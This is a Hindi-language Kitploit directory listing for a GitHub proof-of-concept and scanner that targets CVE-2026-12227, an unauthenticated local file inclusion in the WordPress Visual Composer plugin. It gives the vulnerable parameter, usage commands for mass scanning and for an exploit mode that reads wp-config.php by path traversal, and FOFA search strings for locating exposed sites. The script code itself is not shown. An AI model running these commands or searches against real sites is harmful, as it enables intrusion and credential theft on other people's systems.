Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-12227 — Python 3 PoC और CVE-2026-12227 के लिए स्कैनर, जो WordPress Visual Composer Website Builder में vcv-template पैरामीटर के माध्यम से एक अनधिकृत लोकल फ़ाइल इन्क्लूज़न है। | Kitploit
उपकरण/GitHubGitHub/murrez/cve-2026-12227
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmurrez/cve-2026-12227

CVE-2026-12227

Python 3 PoC और CVE-2026-12227 के लिए स्कैनर, जो WordPress Visual Composer Website Builder में vcv-template पैरामीटर के माध्यम से एक अनधिकृत लोकल फ़ाइल इन्क्लूज़न है।

110घं 57मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-12227 — Visual Composer Website Builder अनधिकृत LFI

CVE-2026-12227 (Wordfence) के लिए Python 3 PoC: Visual Composer Website Builder (wordpress.org पर visualcomposer) में vcv-template क्वेरी पैरामीटर के माध्यम से Local File Inclusion।

PlatformWordPress plugin
ComponentVisual Composer Website Builder
Affected≤ 45.16.0
Fixed in> 45.16.0 (WP Trac 3619572) — नवीनतम स्थिर संस्करण (जैसे 45.16.3+) का उपयोग करें
CVSS9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
AuthUnauthenticated
CWECWE-98
NotWPBakery (js_composer) या SAP NetWeaver Visual Composer

Summary

कमजोर संस्करणों पर, सार्वजनिक पृष्ठ लोड WordPress template_include हैंडलिंग के दौरान PageTemplatesController के अंदर हमलावर-नियंत्रित vcv-template (साथ में vcv-template-type) का पालन करते हैं। यह डिस्क पर हमलावर-चयनित फ़ाइलों को शामिल कर सकता है; PHP फ़ाइलें निष्पादित हो सकती हैं (RCE)। Wordfence कुछ सेटअपों में अपलोड की गई "सुरक्षित" एक्सटेंशनों के साथ चेन का उल्लेख करता है।

Attack surface

  • प्लगइन इंस्टॉल होना और VC से बना फ्रंट-एंड पृष्ठ आवश्यक है (सामान्य परमालिंक)।
  • प्रोब क्वेरी पैरामीटर जोड़ता है, जैसे ?vcv-template-type=vc&vcv-template=blank या vcv-template के अंतर्गत LFI पथ।
  • संबंधित पैरामीटर: vcv-template-type, vcv-template-stretched।

Requirements

root@kitploit:~
pip install -r requirements.txt

Python 3.8+।

Usage

root@kitploit:~
# Version + plugin + VC page crawl + template/LFI probes
python poc.py -u https://target.example --mode check

# Known VC landing page
python poc.py -u https://target.example --mode check --page-url /

# Mass scan
python poc.py --list targets.example.txt --mode check --threads 25 --quiet

# Custom include path (authorized testing only)
python poc.py -u https://target.example --mode exploit --page-url / --file ../../../../../../wp-config.php

# JSON for scripting
python poc.py -u https://target.example --mode check --json

Output

FileMeaning
cve_2026_12227_results.jsonlप्रति-लक्ष्य पूर्ण JSON

Status values

FOFA hints

root@kitploit:~
body="/wp-content/plugins/visualcomposer/"
body="data-vcv-" && body="wp-content"

Technical notes

  • कोड पथ: visualcomposer/Modules/Editors/Settings/PageTemplatesController.php (getCurrentTemplateLayout, viewPageTemplate)।
  • Check param control या LFI markers को exploitable_candidate मानता है; RCE मानने से पहले स्टेजिंग क्लोन पर पुष्टि करें।
  • प्रीमियम TemplateFilter / theme-builder ऐडऑन कुछ साइटों पर पहुंच योग्य पथों को बढ़ा सकते हैं।

Legal

केवल उन सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं या जिनका परीक्षण करने की आपको स्पष्ट अनुमति है।

टूल डाउनलोड करें
hits.txtसंभावित होस्टनाम
candidates.jsonlCheck-mode सारांश (page_url, status, lfi)
StatusMeaning
lfi_confirmedप्रतिक्रिया wp-config / /etc/passwd / version.php ह्यूरिस्टिक्स से मेल खाती है
vcv_template_controllablevcv-template=blank बेसलाइन की तुलना में लेआउट बदलता है (vuln पैरामीटर का पालन किया गया)
plugin_vuln_no_surfaceपुराना प्लगइन संस्करण लेकिन कोई VC पृष्ठ नहीं या पैरामीटर अनदेखा किया गया
no_vc_pageप्लगइन मौजूद है, क्रॉल किए गए पथों पर कोई VC मार्कर नहीं
patchedसंस्करण > 45.16.0